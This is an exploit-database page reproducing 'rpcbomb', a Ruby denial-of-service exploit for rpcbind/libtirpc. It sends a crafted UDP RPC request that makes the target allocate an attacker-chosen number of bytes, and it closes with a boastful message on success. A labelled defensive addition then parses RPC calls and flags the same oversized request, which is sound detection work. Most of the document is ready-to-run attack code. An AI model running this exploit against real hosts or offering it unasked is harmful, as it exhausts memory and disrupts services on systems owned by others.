RPCBind / libtirpc - Denial of Service
Source: https://guidovranken.wordpress.com/ Author: Vranken Published: 2017-05-09
#!/usr/bin/ruby
#
# Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb
#
# By Guido Vranken https://guidovranken.wordpress.com/
# Thanks to Sean Verity for writing an exploit in Ruby for an earlier
# vulnerability: https://www.exploit-db.com/exploits/26887/
# I've used it as a template.
 
require 'socket'
def usage
        abort "\nusage: ./rpcbomb.rb <target> <# bytes to allocate> [port]\n\n"
end
bomb = """
                               ` + # ,        
                           : @ @ @ @ @ @      
               @ @ ; . + @ @ @ .       @ @    
                 @ @ @ @ @ `           @ @    
                                 . `   @ #    
                     ; @ @ @ . : @ @ @ @      
                 @ @ @ @ @ @ @ @ @ @ @ ;      
               @ @ @ @ @ @ @ @ @ @ @ @ @ `    
             @ @ @ @ @ @ @ @ @ @ @ @ @ @ :    
           # @ @ @ @ @ @ @ @ @ @ @ @ @ '      
           @ @ @ @ @ @ @ @ @ @ @ @ @ @ @      
         . @ @ @ @ @ @ @ @ @ @ @ @ @ @ @      
         + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @      
         + @ @ @ @ @ @ @ @ @ @ @ @ @ @ @      
         : @ @ @ @ @ @ @ @ @ @ @ @ @ @ @      
           @ @ @ @ @ @ @ @ @ @ @ @ @ @ @      
           @ @ @ @ @ @ @ @ @ @ @ @ @ @ ,      
             @ @ @ @ @ @ @ @ @ @ @ @ @        
             , @ @ @ @ @ @ @ @ @ @ @          
               ` @ @ @ @ @ @ @ @ @            
                   , @ @ @ @ @ 
     r p c b o m b
 
     DoS exploit for *nix rpcbind/libtirpc.
 
     (c) 2017 Guido Vranken.
 
     https://guidovranken.wordpress.com/
 
"""
 
puts bomb
 
if ARGV.length >= 2
    begin
        host = ARGV[0]
        numBytes = Integer(ARGV[1])
        port = ARGV.length == 3 ? Integer(ARGV[2]) : 111
    rescue
        usage
    end
 
    pkt = [0].pack('N')         # xid
    pkt << [0].pack('N')        # message type CALL
    pkt << [2].pack('N')        # RPC version 2
    pkt << [100000].pack('N')   # Program
    pkt << [4].pack('N')        # Program version
    pkt << [9].pack('N')        # Procedure
    pkt << [0].pack('N')        # Credentials AUTH_NULL
    pkt << [0].pack('N')        # Credentials length 0
    pkt << [0].pack('N')        # Verifier AUTH_NULL
    pkt << [0].pack('N')        # Verifier length 0
    pkt << [0].pack('N')        # Program: 0
    pkt << [0].pack('N')        # Ver
    pkt << [4].pack('N')        # Proc
    pkt << [4].pack('N')        # Argument length
    pkt << [numBytes].pack('N') # Payload
 
    s = UDPSocket.new
    s.send(pkt, 0, host, port)
 
    sleep 1.5
 
    begin
        s.recvfrom_nonblock(9000)
    rescue
        puts "No response from server received."
        exit()
    end
 
    puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" +
        "\nDamn it feels good to be a gangster.\n\n"
else
    usage
end
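
A detection-side check for the request layout the script above sends, as an added example that is not part of rpcbomb or of the original page. The helper names, the 1 MiB threshold and the sample datagrams are assumptions constructed for illustration; treating the final argument word as the requested size follows the script's own "# bytes to allocate" label.

```ruby
# Added detection example; helper names and LIMIT are assumptions, not rpcbomb code.
RPCBIND_PROGRAM = 100_000
LIMIT = 1 << 20 # assumed alert threshold: 1 MiB

# Parse an ONC RPC version 2 CALL header from a UDP payload.
# Returns nil when the bytes are truncated or are not a version 2 CALL.
def parse_rpc_call(data)
  data = data.b
  return nil if data.bytesize < 24
  xid, type, rpcvers, prog, vers, procnum = data.unpack('N6')
  return nil unless type == 0 && rpcvers == 2
  off = 24
  2.times do # credentials, then verifier: flavor, length, padded opaque body
    return nil if data.bytesize < off + 8
    len = data[off + 4, 4].unpack1('N')
    return nil if len > 400 # RFC 5531 caps an opaque_auth body at 400 bytes
    off += 8 + ((len + 3) & ~3)
    return nil if off > data.bytesize
  end
  { xid: xid, prog: prog, vers: vers, proc: procnum, args: data[off..-1] }
end

# True when the datagram has the layout sent by the script above (rpcbind
# program, version 4, procedure 9, five argument words) and the final word,
# which the script fills with its "# bytes to allocate" value, exceeds limit.
def oversized_rpcbind_request?(data, limit: LIMIT)
  call = parse_rpc_call(data)
  return false unless call && call[:prog] == RPCBIND_PROGRAM
  return false unless call[:vers] == 4 && call[:proc] == 9
  args = call[:args]
  return false unless args.bytesize == 20
  args[16, 4].unpack1('N') > limit
end

# Constructed sample datagrams (not captured traffic).
HEADER = [0, 0, 2, RPCBIND_PROGRAM, 4, 9, 0, 0, 0, 0].freeze
LARGE = (HEADER + [0, 0, 4, 4, 500_000_000]).pack('N*')
SMALL = (HEADER + [0, 0, 4, 4, 16]).pack('N*')
```

The check is a narrow signature for this one layout; a sensor would call `oversized_rpcbind_request?` on each UDP payload addressed to the rpcbind port (111 by default in the script above).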
 